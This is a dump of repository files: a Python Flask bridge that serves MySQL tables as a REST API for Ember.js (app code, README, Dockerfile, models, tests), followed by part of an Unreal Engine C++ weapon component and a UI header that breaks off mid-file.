print(data.json())\n resp = requests.post(url, data=data.json())\n print(resp)\n print(resp.content)\n\nif __name__ == \"__main__\":\n create_provider()\n" }, { "alpha_fraction": 0.8103448152542114, "alphanum_fraction": 0.8103448152542114, "avg_line_length": 42.5, "blob_id": "b87fbf2fad64d07a23cd188e9d7ad644f78c6194", "content_id": "78b08fef7c595256989263f9a224530128d85156", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 174, "license_type": "permissive", "max_line_length": 48, "num_lines": 4, "path": "/example/app/api/__init__.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "from .provider_routes import api as provider_api\nfrom .client_routes import api as client_api\nfrom .auth_routes import api as auth_api\nfrom .blockchain import blockchain_api\n" }, { "alpha_fraction": 0.7069701552391052, "alphanum_fraction": 0.7339971661567688, "avg_line_length": 27.15999984741211, "blob_id": "893a39aa52165edd752b76c060dd5cc88650d55f", "content_id": "59b90c81fe19839476bb1cdf57cd95b614780559", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 703, "license_type": "permissive", "max_line_length": 150, "num_lines": 25, "path": "/example/Dockerfile", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "FROM tiangolo/uvicorn-gunicorn-fastapi:python3.7\n\nCOPY ./app /app/app\n\nWORKDIR /app/app\n\nRUN pip install --no-cache-dir -r requirements.txt\n\nWORKDIR /\n\nARG CONNECTION_STRING\nARG DATABASE\nARG NODES\nARG USER_POOL_ID\nARG USER_POOL_WEB_CLIENT_ID\n\nENV CONNECTION_STRING=$CONNECTION_STRING\nENV DATABASE=$DATABASE\nENV NODES=$NODES\nENV USER_POOL_ID=$USER_POOL_ID\nENV USER_POOL_WEB_CLIENT_ID=$USER_POOL_WEB_CLIENT_ID\n\nRUN openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.crt -days 365 -nodes -subj \"/C=CA/ST=ON/L=TORONTO/O=Blockmedi Solutions/CN=Blockmedi\"\n\nCMD [\"gunicorn\", \"-b\", \"0.0.0.0:443\", \"--keyfile\", \"key.pem\", \"--certfile\", \"cert.crt\", \"-k\", \"uvicorn.workers.UvicornWorker\", \"app.main:app\"]" }, { "alpha_fraction": 0.6465318202972412, "alphanum_fraction": 0.650288999080658, "avg_line_length": 33.599998474121094, "blob_id": "a20a3c3ed4a05a8af1e04958fcfa8138ebcee927", "content_id": "47f4e34465b489a918df0164fcd2b86536d46120", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3460, "license_type": "permissive", "max_line_length": 99, "num_lines": 100, "path": "/example/app/api/blockchain/models.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "import uuid\nimport json\nimport logging\nfrom hashlib import sha256\nfrom datetime import datetime\nfrom pydantic import BaseModel\nfrom ..util import HelperEncoder\n\n\nclass Block:\n def __init__(self, id, data, block_type, timestamp: datetime, previous_hash,\n data_collection_name, data_key_field_name, data_key_value):\n self.id = id\n self.block_type = block_type\n self.timestamp = timestamp\n self.previous_hash = previous_hash\n self.data = json.dumps(data, cls=HelperEncoder)\n\n logging.debug(json.dumps(self.__dict__, sort_keys=True, cls=HelperEncoder))\n\n self.hash = sha256(json.dumps(self.__dict__, sort_keys=True, cls=HelperEncoder).encode()) \\\n .hexdigest()\n self.data_collection_name = data_collection_name\n self.data_key_field_name = data_key_field_name\n self.data_key_value = data_key_value\n self.superceded = False\n\n def get_naked_block(self):\n return NakedBlock(self.id, self.timestamp, self.block_type, self.hash, self.previous_hash)\n\n def get_data_block(self):\n return DataBlock(self.timestamp, self.data_collection_name,\n self.data, self.hash, self.block_type, self.superceded)\n\n\nclass NakedBlock:\n def __init__(self, id, timestamp, block_type, hash, previous_hash):\n self.id = id\n self.block_type = block_type\n self.timestamp = timestamp\n self.previous_hash = previous_hash\n self.hash = hash\n\n\nclass DataBlock:\n def __init__(self, timestamp, data_collection_name, data, hash, block_type, superceded):\n self.timestamp = timestamp\n self.collection = data_collection_name\n self.block_type = block_type\n self.data = data\n self.superceded = superceded\n self.hash = hash\n\n def set_superceded(self):\n self.superceded = True\n\n def get_document(self):\n document = json.loads(self.data)\n document['hash_id'] = self.hash\n document['block_type'] = self.block_type\n document['superceded'] = self.superceded\n return document\n\n\ndef block_types_lookup(block_type):\n block_types = {\"CREATE\": 0, \"GRANT\": 1, \"EDIT\": 2}\n return block_types[block_type]\n\n\ndef block_types_reverse_lookup(block_type):\n print(block_type)\n block_types = {0: \"CREATE\", 1: \"GRANT\", 2: \"EDIT\"}\n return block_types[block_type]\n\n\nclass ProposedBlock(BaseModel):\n id: str\n block_type: str\n timestamp: str\n data: str\n data_collection_name: str\n data_key_field_name: str\n data_key_value: str\n\n\ndef generate_block(data, block_type, timestamp: datetime, previous_hash,\n data_collection_name, data_key_field_name, data_key_value):\n return Block(uuid.uuid4().hex, data, block_type, timestamp, previous_hash,\n data_collection_name, data_key_field_name, data_key_value)\n\ndef generate_audit_block(id, data, block_type, timestamp: datetime, previous_hash):\n del data[\"hash_id\"]\n return Block(id, data, block_type, timestamp, previous_hash, '', '', '')\n\n\ndef generate_from_proposed_block(proposed_block: ProposedBlock, previous_hash):\n return Block(proposed_block.id, json.loads(proposed_block.data),\n proposed_block.block_type, proposed_block.timestamp, previous_hash,\n proposed_block.data_collection_name, proposed_block.data_key_field_name,\n proposed_block.data_key_value)\n" }, { "alpha_fraction": 0.6663001775741577, "alphanum_fraction": 0.6663001775741577, "avg_line_length": 17.190000534057617, "blob_id": "3805c2c54c2fe52b0d0bd41cd1e719d412f5c3cd", "content_id": "24d66bc7f10dd204f25457f95293f037faf61861", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1819, "license_type": "permissive", "max_line_length": 58, "num_lines": 100, "path": "/example/app/api/auth_models.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "\"\"\"\nModels that are used during the authentication process and\nfor adding new clients/providers\n\"\"\"\n\nfrom typing import List\nfrom datetime import datetime\nfrom pydantic import BaseModel, EmailStr\nfrom .common_models import Address, Name, PhoneNumbers\nfrom .provider_models import ProvidableTreatment\n\n\nclass RegisterClient(BaseModel):\n \"\"\"\n Model for client registration\n \"\"\"\n username: str\n password: str\n name: Name\n phoneNumbers: PhoneNumbers\n address: Address\n dateOfBirth: datetime\n email: EmailStr\n\n\nclass RegisterProvider(BaseModel):\n \"\"\"\n Model for provider registration\n \"\"\"\n username: str\n password: str\n name: Name\n phoneNumbers: PhoneNumbers\n addresses: List[Address]\n dateOfBirth: datetime\n email: EmailStr\n providableTreatments: List[ProvidableTreatment]\n\n\nclass SignIn(BaseModel):\n \"\"\"\n Model for sign in\n \"\"\"\n username: str\n password: str\n\n\nclass ConfirmSignUp(BaseModel):\n \"\"\"\n Model for confirming sign up\n \"\"\"\n username: str\n verificationCode: str\n\n\nclass ForgotPassword(BaseModel):\n \"\"\"\n Model for forgot password\n \"\"\"\n username: str\n\n\nclass ConfirmForgotPassword(BaseModel):\n \"\"\"\n Model for confirming a client forgotten password\n \"\"\"\n username: str\n verification_code: str\n new_password: str\n\n\nclass ChangePassword(BaseModel):\n \"\"\"\n Model for changing a password\n \"\"\"\n old_password: str\n new_password: str\n\nclass User(BaseModel):\n \"\"\"\n Model for user\n \"\"\"\n userId: str\n username: str\n usertype: str\n\nclass Token(BaseModel):\n \"\"\"\n Model for auth token\n \"\"\"\n id_token: str\n access_token: str\n refresh_token: str\n\nclass SignInResponse(BaseModel):\n \"\"\"\n Model for sign in response\n \"\"\"\n user: User\n token: Token\n" }, { "alpha_fraction": 0.7802197933197021, "alphanum_fraction": 0.7802197933197021, "avg_line_length": 29.33333396911621, "blob_id": "f245828ae993f4e7afdcdecd4588aa033d8c4d12", "content_id": "dacffc90a7f070aa49f021dd8e98c777ebe47cff", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 91, "license_type": "permissive", "max_line_length": 52, "num_lines": 3, "path": "/example/app/api/blockchain/api/__init__.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "\"\"\"Renaming blockchain api export\"\"\"\n\nfrom .blockchain_routes import api as blockchain_api\n" }, { "alpha_fraction": 0.6943867206573486, "alphanum_fraction": 0.6985446810722351, "avg_line_length": 27.352941513061523, "blob_id": "13d8a8aac5102be31ad748d7e4a9dd27a63f13fc", "content_id": "f84320291e63b0b44204191d8c16548be4248f9a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 481, "license_type": "permissive", "max_line_length": 50, "num_lines": 17, "path": "/example/test/test_blockchain.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "import unittest\nimport time\nfrom blockchain.blockchain import Blockchain\nfrom blockchain.block import Block\n\nclass testTest(unittest.TestCase):\n def test_genesis_block_created(self):\n blockchain = Blockchain()\n self.assertEqual(len(blockchain.chain), 1)\n\n def test_add_single_block(self):\n blockchain = Blockchain()\n blockchain.addBlock([\"aaa\"])\n self.assertEqual(len(blockchain.chain), 2)\n\n def test(self):\n self.assertTrue(True)" }, { "alpha_fraction": 0.5772076845169067, "alphanum_fraction": 0.5801677107810974, "avg_line_length": 30.671875, "blob_id": "ea47faa3ec52fb9a7027a56f6f5bf02f30790610", "content_id": "06caf8c90f3994e0800804d3cb04eadb56aaaf9c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2027, "license_type": "permissive", "max_line_length": 82, "num_lines": 64, "path": "/example/app/api/util.py", "repo_name": "monoper/BlockchainDB", "src_encoding": "UTF-8", "text": "\"\"\"Utility functions\"\"\"\n\nimport json\nimport uuid\nimport os\nfrom datetime import datetime\nfrom pycognito import Cognito\nfrom fastapi import Depends, HTTPException\nfrom fastapi.security.http import HTTPBearer, HTTPBasicCredentials\nfrom .common_models import AppointmentStatus, Provinces, Appointment, \\\n Address, Name, PhoneNumbers, ProvidableTreatment, \\\n PrescribedTreatment, Notes\nfrom .provider_models import Provider\nfrom .client_models import Client, LinkedProvider\n\nauth = HTTPBearer()\n\nasync def verify_auth_header(authorization: HTTPBasicCredentials = Depends(auth)):\n \"\"\"\n Verifies the credentials sent in the authorisation header with cognito\n \"\"\"\n try:\n aws_cognito = Cognito(os.environ['USER_POOL_ID'],\n os.environ['USER_POOL_WEB_CLIENT_ID'],\n access_token=authorization.credentials)\n if aws_cognito.get_user() is None:\n raise HTTPException(status_code=403)\n\n return authorization.credentials\n except Exception as forbidden:\n raise HTTPException(status_code=403) from forbidden\n\n\nclass HelperEncoder(json.JSONEncoder):\n \"\"\"\n Helper for JSON decoding of classes\n \"\"\"\n def default(self, o):\n if isinstance(o, uuid.UUID):\n return str(o)\n\n if isinstance(o, datetime):\n return o.isoformat()\n\n if isinstance(o, Provinces):\n return o.value\n\n if isinstance(o, AppointmentStatus):\n return o.value\n\n if isinstance(o,\n (Address,\n Appointment,\n Client,\n Name,\n PhoneNumbers,\n ProvidableTreatment,\n Provider,\n LinkedProvider, \n PrescribedTreatment, \n Notes)):\n return o.__dict__\n\n return json.JSONEncoder.default(self, o)\n" } ]
25
BruceJL/mysql-json-bridge
https://github.com/BruceJL/mysql-json-bridge
98aa33fa8da3a0ea0e73fe86531079dc5da0f47d
fedf564bc0ce59c2eb756b51242b3b25d82b016b
4421a16c54808086dbb3e880c4289efbaa881aa3
refs/heads/master
2020-12-21T23:37:53.982492
2020-01-27T22:12:52
2020-01-27T22:12:52
236,602,190
0
0
null
2020-01-27T21:45:59
2019-12-30T13:40:32
2017-02-23T13:43:09
null
[ { "alpha_fraction": 0.6946220397949219, "alphanum_fraction": 0.7032719254493713, "avg_line_length": 28.87640380859375, "blob_id": "36eb7551e898e5a140828654cf8c9be39d9314bb", "content_id": "0e377522110a1342e07f45723683de1c1ad3e54b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2659, "license_type": "no_license", "max_line_length": 80, "num_lines": 89, "path": "/README.md", "repo_name": "BruceJL/mysql-json-bridge", "src_encoding": "UTF-8", "text": "mysql-json-bridge\n=================\nThis is a fork of the mysql-json-bridge as found at:\nhttp://github.com/rackerhacker/mysql-json-bridge. It has been changed such that\nit acts as a restful database between an Ember.js client and a MariaDB (nee\nMySQL database.)\n\nIt has been updated from the source to Python 3 and to support the default\nEmber.js RESTadapter.\n\nInstallation & Startup\n----------------------\nInstall a few prerequisites:\n\n The Debian packages required to run this software are as follows:\n python3\n python3-flask\n python3-pretty-yaml\n python3-jsonpickle\n python3-pymysql\n python3-inflect\n python3-dateutil\n python3-flash-cors\n\nGet the source:\n\n git clone http://github.com/BruceJL/mysql-json-bridge\n cd mysql-json-bridge\n python app.py\n\nConfiguration\n-------------\nMake a conf.d directory with separate database configuration files:\n\n # conf.d/database1.yaml\n ---\n identifier: 'prod.database1'\n scheme: 'mysql'\n username: 'database1'\n password: 'secret_password'\n database: 'database1'\n hostname: 'database1.domain.com'\n enabled: 'True'\n\n # conf.d/database2.yaml\n ---\n identifier: 'staging.database2'\n scheme: 'mysql'\n username: 'database2'\n password: 'secret_password'\n database: 'database2'\n hostname: 'database2.domain.com'\n enabled: 'True'\n\nUsage\n-----\nTo issue a query to the bridge, simply make an HTTP POST to the appropriate URL.\nYour URL should be something like this:\n\n http://localhost:5000/<database>/<table>\n\nWill pull all entries for that table.\n\nExample wsgi file for usage with a web server is supplied as wsgi.py. It seems\nto run will using gunicorn.\n\n*IMPORTANT* security considerations\n-----------------------------------\n**The base mysql-json-bridge server doesn't do any query filtering nor does it\ndo any authentication. You'd need to configure that yourself within your web\nserver.**\n\nAlso, be very careful with the user you configure in your `environments.yml`.\nIf the user has write access to your database, people could issue UPDATE and\nDELETE statements through the bridge.\n\nIf you create read-only MySQL users for the bridge to use, **ensure that those\nusers have read access *only* to the databases that you specify.** Giving\nglobal read access to a user allows them to read your `mysql.user` table which\ncontains hashed passwords. *This could lead to a very bad experience.*\n\nGot improvements? Found a bug?\n-------------------------------\nIssue a pull request or open an issue in GitHub.\nI appreciate and welcome all feedback you have!\n\nTip of the hat\n--------------------\nBig tip of the hat to major for the material to make the fork.\n" }, { "alpha_fraction": 0.590452253818512, "alphanum_fraction": 0.5957465767860413, "avg_line_length": 29.615385055541992, "blob_id": "e4743ad67959faed0a4bfc9a5c435378cd9143bf", "content_id": "3edd5f14c7e0fea63212849fa4b1977109db7fcb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11144, "license_type": "no_license", "max_line_length": 110, "num_lines": 364, "path": "/app.py", "repo_name": "BruceJL/mysql-json-bridge", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3\n#\n# Copyright 2012 Major Hayden\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"MySQL <-> JSON bridge <-> Ember.js\"\"\"\n\nimport datetime\nimport decimal\nimport json\nimport logging\nimport os\nimport sys\nimport yaml\nimport inflect\nimport pymysql\nimport threading\nimport re\n\nfrom dateutil import parser\nfrom flask import Flask, Response, abort, request, current_app\nfrom functools import wraps, update_wrapper\nfrom urllib.parse import urlparse, urlunparse\nfrom flask_cors import CORS, cross_origin\n\napp = Flask(__name__)\nCORS(app)\napp.logger.setLevel(logging.INFO)\napp.debug = True\ndbs = {}\n\ninflection = inflect.engine()\nsql_condition = threading.Condition()\n\n# Helps us find non-python files installed by setuptools\ndef data_file(fname):\n \"\"\"Return the path to a data file of ours.\"\"\"\n return os.path.join(os.path.split(__file__)[0], fname)\n\nif not app.debug:\n logyaml = \"\"\n with open(data_file('config/log.yml'), 'r') as f:\n logyaml = yaml.load(f)\n try:\n formatter = logging.Formatter('%(asctime)s - %(message)s')\n if logyaml['type'] == \"file\":\n from logging.handlers import RotatingFileHandler\n file_handler = RotatingFileHandler(\n logyaml['logfile'], backupCount=logyaml['backupCount'])\n file_handler.setLevel(logging.INFO)\n file_handler.setFormatter(formatter)\n app.logger.addHandler(file_handler)\n elif logyaml['type'] == 'syslog':\n from logging.handlers import SysLogHandler\n syslog_handler = SysLogHandler()\n syslog_handler.setLevel(logging.INFO)\n syslog_handler.setFormatter(formatter)\n app.logger.addHandler(syslog_handler)\n except:\n pass\n\n\n# Decorator to return JSON easily\ndef jsonify(f):\n @wraps(f)\n def inner(*args, **kwargs):\n # Change our datetime columns into strings so we can serialize\n jsonstring = json.dumps(f(*args, **kwargs), default=json_fixup)\n return Response(jsonstring, mimetype='application/json')\n return inner\n\n\ndef json_fixup(obj):\n if isinstance(obj, datetime.datetime):\n return obj.isoformat()\n if isinstance(obj, decimal.Decimal):\n return float(obj)\n else:\n return None\n\n\ndef read_config():\n app.logger.debug(\"entering read_config()\")\n databases = {}\n cfiles = []\n\n cdir = data_file('conf.d/')\n for dirname, dirnames, filenames in os.walk(cdir):\n for filename in filenames:\n fullpath = os.path.join(dirname, filename)\n cfiles.append(fullpath)\n\n for cfile in cfiles:\n tmp = {}\n\n if not cfile.endswith('.yaml'):\n continue\n\n fh = open(data_file(cfile), 'r')\n db = yaml.load(fh)\n fh.close()\n\n if db is None:\n continue\n\n if 'identifier' not in db:\n continue\n\n if 'enabled' not in db:\n continue\n\n if db['enabled'] != 'True':\n continue\n\n identifier = db['identifier']\n\n required = ['scheme', 'username', 'password', 'hostname', 'database']\n if not all(param in db for param in required):\n continue\n\n scheme = db['scheme']\n netloc = '%s:%s@%s' % (db['username'], db['password'], db['hostname'])\n path = '/%s' % db['database']\n conn = (scheme, netloc, path, None, None, None)\n connection_string = urlunparse(conn)\n\n tmp[identifier] = connection_string\n databases = dict(databases.items() | tmp.items())\n app.logger.debug(\"Successfully read configuration files\")\n return databases\n\n\n# Pull the database credentials from our YAML file\ndef get_db_creds(database):\n databases = read_config()\n mysql_uri = databases.get(database)\n\n # If the database doesn't exist in the yaml, we're done\n if not mysql_uri:\n return False\n\n # Parse the URL in the .yml file\n try:\n o = urlparse(mysql_uri)\n creds = {\n 'host': o.hostname,\n 'db': o.path[1:],\n 'user': o.username,\n 'passwd': o.password,\n }\n except:\n creds = False\n\n return creds\n\n\ndef setup_db_connection(database):\n if database in dbs.keys():\n db = dbs[database]\n if db.open:\n app.logger.debug(\"Using existing database connection to \" + database)\n return db\n\n creds = get_db_creds(database)\n\n # If we couldn't find corresponding credentials, throw a 404\n if not creds:\n app.logger.error(\"Unable to find credentials for %s.\" % database)\n raise Exception(\"ERROR Unable to find credentials matching %s.\" % database)\n\n # Prepare the database connection\n app.logger.debug(\"Connecting to %s database (%s)\" % (\n database, request.remote_addr))\n db = pymysql.connect(**creds)\n db.autocommit(True)\n\n dbs[database] = db\n #return the database object\n return db\n\n\ndef execute_sql(cursor, database, sql, vars):\n # Attempt to run the query\n app.logger.info(\"%s attempting to run \\\"%s\\\" against %s database with tuple %s\" % (\n request.remote_addr, sql, database, vars))\n try:\n sql_condition.acquire()\n cursor.execute(sql, vars)\n data = cursor.fetchall()\n sql_condition.release()\n app.logger.info(\"returning \" + str(len(data)) + \" results\")\n app.logger.debug(\"results: \" + str(data))\n return data\n\n except pymysql.err.MySQLError as e:\n app.logger.error(\"ERROR\" + str(e.args) + \" When running \" + sql)\n #app.logger.error(\"ERROR\" + \" \".join(str(i) for i in e.args + \"When running \" + sql))\n abort(500)\n except Exception as e:\n app.logger.error(\"query failed: \" + str(e))\n\n\ndef make_name_value_list_string(items):\n updates = []\n vars = ()\n for k, v in items:\n if v is not None:\n if type(v) is str:\n if re.search('^\\d\\d\\d\\d-\\d\\d-\\d\\dT\\d\\d:\\d\\d:\\d\\d\\.\\d\\d\\dZ$', v):\n if \"1970-01-01T00:00:00.000Z\" == v:\n v = datetime.datetime.now().isoformat()\n else:\n v = parser.parse(v)\n v = v.strftime(\"%Y-%m-%d %H:%M:%S\")\n\n updates.append(\"`\" + str(k) + \"`= %s\")\n vars = vars + (v,)\n\n # make the string\n string = ','.join(str(x) for x in updates)\n return (string, vars)\n\n\n# This handles ember style queries\[email protected](\"/<database>/<table>\", methods=['GET'])\n@jsonify\ndef do_ember_table(database=None, table=None):\n db = None\n try:\n db = setup_db_connection(database)\n\n table_singular = inflection.singular_noun(table)\n if table_singular != False:\n\n\n cursor = db.cursor(pymysql.cursors.DictCursor)\n\n sql = \"SELECT * from `\" + table_singular + \"`;\"\n results = execute_sql(cursor, database, sql, ())\n return {table : results}\n else:\n abort(404)\n\n except pymysql.err.MySQLError as e:\n app.logger.error(\"Failed to setup database connection: \" + str(e) )\n abort(404)\n\n\n# This method is used to create new entries\[email protected](\"/<database>/<table>\", methods=['POST'])\ndef do_json_table_post(database=None, table=None):\n db = None\n data = None\n json_data = None\n\n app.logger.info(\"Got POST to \" + database + \" table \" + table + \" of \" + str(request.json))\n db = setup_db_connection(database)\n\n table_singular = inflection.singular_noun(table)\n cursor = db.cursor(pymysql.cursors.DictCursor)\n\n (s, vars) = make_name_value_list_string(request.json[table_singular].items())\n\n sql = \"INSERT INTO `\" + table_singular + \\\n \"` SET \" + s + \";\"\n try:\n results = execute_sql(cursor, database, sql, vars)\n\n sql = \"SELECT LAST_INSERT_ID();\"\n results = execute_sql(cursor, database, sql, ())\n\n id = str(results[0]['LAST_INSERT_ID()'])\n\n sql = \"SELECT * FROM `\" + table_singular + \"` WHERE id = %s;\"\n results = execute_sql(cursor, database, sql, (id,))\n result = results[0]\n data = {table: result}\n json_data = json.dumps(data, default=json_fixup)\n app.logger.info(\"json data: \" + str(json_data))\n\n except pymysql.err.MySQLError as e:\n app.logger.error(str(e))\n raise e\n\n finally:\n if json_data is not None:\n return Response(json_data, status=201, mimetype='application/json')\n else:\n abort(500)\n\[email protected](\"/<database>/<table>/<id>\", methods=['GET'])\n@jsonify\ndef do_json_get_table_entry(database=None, table=None, id=None):\n db = None\n data = None\n try:\n db = setup_db_connection(database)\n\n table_singular = inflection.singular_noun(table)\n cursor = db.cursor(pymysql.cursors.DictCursor)\n\n sql = \"SELECT * from `\" + table_singular + \\\n \"` WHERE `id`=%s;\"\n\n results = execute_sql(cursor, database, sql, (id,))\n result = results[0]\n data = {table : result}\n\n if request.args.get('include') is not None:\n include_singular = request.args.get('include')\n include = inflection.plural(include_singular)\n\n sql = \"SELECT * from `\" + include_singular + \\\n \"` WHERE `\" + table_singular + \"`= %s;\"\n include_results = execute_sql(cursor, database, sql, (id,))\n\n include_indexs = []\n for x in include_results:\n include_indexs.append(x['id'])\n\n app.logger.debug(\"include_indexs: \" + str(include_indexs))\n\n result.update({include : include_indexs})\n data = {table : [result], include : include_results}\n\n except pymysql.err.MySQLError as e:\n app.logger.error(\"MySQLError: \" + str(e))\n abort(404)\n finally:\n return data\n\[email protected](\"/<database>/<table>/<id>\", methods=['PUT'])\n@jsonify\ndef do_json_put_table_entry(database=None, table=None, id=None):\n app.logger.info(\"Got PUT to \" + database + \", table \" + table + \", id \" + id + \" of \" + str(request.json))\n\n db = setup_db_connection(database)\n\n table_singular = inflection.singular_noun(table)\n cursor = db.cursor(pymysql.cursors.DictCursor)\n\n app.logger.debug(\"json: \" + str(request.json[table_singular].items()))\n (s, vars) = make_name_value_list_string(request.json[table_singular].items())\n\n sql = \"UPDATE `\" + table_singular + \\\n \"` SET \" + \\\n s + \\\n \" WHERE `id`= %s;\"\n results = execute_sql(cursor, database, sql, vars + (id,))\n return Response(\"\", status=200)\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', threaded=True)\n" } ]
2
pkucherov/ProjectGun-wkdtpeo
https://github.com/pkucherov/ProjectGun-wkdtpeo
b3500e170c2c264392c14efacb133a3b15e68c31
d5a771ffdb3caa6a013be67c4391676409d4e90d
54798c512457f7f5bda4973530dda4c217baa608
refs/heads/main
2023-06-24T13:00:25.653918
2021-07-15T01:52:20
2021-07-15T01:52:20
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6342364549636841, "alphanum_fraction": 0.6342364549636841, "avg_line_length": 24.77777862548828, "blob_id": "cdcfc33d2f62b2b1fde154216970df1f174440f5", "content_id": "b9c4ab00fd5c75de320d30d1a85c69c283ea4c6b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1720, "license_type": "no_license", "max_line_length": 95, "num_lines": 63, "path": "/Source/Project_Gun/Public/UI/PG_UserWidgetScreenStageFailed.h", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#pragma once\n\n#include \"Project_Gun/Project_Gun.h\"\n#include \"Blueprint/UserWidget.h\"\n\n#include \"PG_UserWidgetScreenStageFailed.generated.h\"\n\n/**\n * \n */\nUCLASS()\nclass PROJECT_GUN_API UPG_UserWidgetScreenStageFailed : public UUserWidget\n{\n\tGENERATED_BODY()\n\nprotected:\n\tvirtual void NativeConstruct() override;\n\npublic:\n\tvirtual void SetVisibility(ESlateVisibility InVisibility) override;\n\npublic :\n\tvoid SetPopupTitle(FString kTitle);\n\n\tUFUNCTION(BlueprintCallable)\n\tbool IsAbleViewStagePlayAD();\n\n\tUFUNCTION(BlueprintCallable)\n\tvoid UpdateLayout();\n\nprotected:\n\t// Popup Title\n\tPG_WIDGET_DECLAR(UTextBlock, TextTitle);\n\n\t// Mission State\n\tPG_WIDGET_DECLAR(UButton, BtnFlag);\n\tPG_WIDGET_DECLAR(UButton, BtnLethal);\n\tPG_WIDGET_DECLAR(UButton, BtnTime);\n\n\t// Menu Button\n\tPG_WIDGET_DECLAR(UButton, BtnHome);\n\tPG_WIDGET_DECLAR(UButton, BtnRetry);\n\n\tUPROPERTY(EditAnywhere, Category = \"PG Sound\")\n\tclass USoundBase* PopupPlaySound = nullptr;\n\nprotected:\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnHome();\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnBtnRetry();\n\n\t//============================================================================================\n\t// 광고 시청에 대한 결과\n\t//============================================================================================\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnADPlayStageVideoSucessed();\t// 스테이지 플레이형 광고를 성공적으로 보았음\n\tUFUNCTION(BlueprintCallable)\n\tvoid OnADPlayStageVideoClosed();\t// 스테이지 플레이형 광고를 닫거나 실패하였음\n\t//============================================================================================\n};\n" }, { "alpha_fraction": 0.7591130137443542, "alphanum_fraction": 0.7621506452560425, "avg_line_length": 27.38793182373047, "blob_id": "f68e86cead0a9cefbaea69c50eb342485a05eae4", "content_id": "de6b902d4eca346e89ad43e0855c69dfddc58b07", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3294, "license_type": "no_license", "max_line_length": 132, "num_lines": 116, "path": "/Source/Project_Gun/Private/Character/Component/PG_ComponentWeapon.cpp", "repo_name": "pkucherov/ProjectGun-wkdtpeo", "src_encoding": "UTF-8", "text": "// Fill out your copyright notice in the Description page of Project Settings.\n\n#include \"Character/Component/PG_ComponentWeapon.h\"\n#include \"Character/PG_Char.h\"\n#include \"BlueScriptObject/Weapon/PG_Weapon.h\"\n#include \"Game/GameInstance/PG_GameInstance.h\"\n\n// Sets default values for this component's properties\nUPG_ComponentWeapon::UPG_ComponentWeapon()\n{\n\t// Set this component to be initialized when the game starts, and to be ticked every frame. You can turn these features\n\t// off to improve performance if you don't need them.\n\tPrimaryComponentTick.bCanEverTick = false;\n\n\t// ...\n}\n\n\n// Called when the game starts\nvoid UPG_ComponentWeapon::BeginPlay()\n{\n\tSuper::BeginPlay();\n\n\tEquipWeapon(WeaponTableIndex);\n}\n\n// Called every frame\nvoid UPG_ComponentWeapon::TickComponent(float DeltaTime, ELevelTick TickType, FActorComponentTickFunction* ThisTickFunction)\n{\n\tSuper::TickComponent(DeltaTime, TickType, ThisTickFunction);\n\n\t// ...\n}\nbool UPG_ComponentWeapon::EquipWeapon(int32 nWeaponTableIndex)\n{\n\tauto pGameInstance = Cast<UPG_GameInstance>(GetWorld()->GetGameInstance());\n\tABCHECK(nullptr != pGameInstance, false);\n\n\tauto pWeaponTableData = pGameInstance->GetWeaponTableData(WeaponTableIndex);\n\tABCHECK(nullptr != pWeaponTableData, false);\n\n\tauto Owner = Cast<APG_Char>(GetOwner());\n\tABCHECK(nullptr != Owner, false);\n\n\tAPG_Weapon* NewWeapon = GetWorld()->SpawnActor<APG_Weapon>(pWeaponTableData->BPWeapon, FVector::ZeroVector, FRotator::ZeroRotator);\n\tABCHECK(nullptr != NewWeapon, false);\n\tABCHECK(NewWeapon->SetWeaponData(nWeaponTableIndex), false)\n\n\tif (CurrentWeapon.IsValid(true))\n\t\tUnEquipWeapon();\n\n\tFName MonsterGunSocket(TEXT(\"Bip001-L-GunSocket\"));\n\tNewWeapon->AttachToComponent(Owner->GetMesh(), FAttachmentTransformRules::SnapToTargetNotIncludingScale, MonsterGunSocket);\n\tNewWeapon->SetOwner(Owner);\n\n\tCurrentWeapon = NewWeapon;\n\t\n\treturn true;\n}\n//\n//bool UPG_ComponentWeapon::EquipWeapon(const TSubclassOf<class APG_Weapon>& WeaponType)\n//{\n//\tauto Owner = Cast<APG_Char>(GetOwner());\n//\tABCHECK(nullptr != Owner, false);\n//\n//\tAPG_Weapon* NewWeapon = GetWorld()->SpawnActor<APG_Weapon>(WeaponType, FVector::ZeroVector, 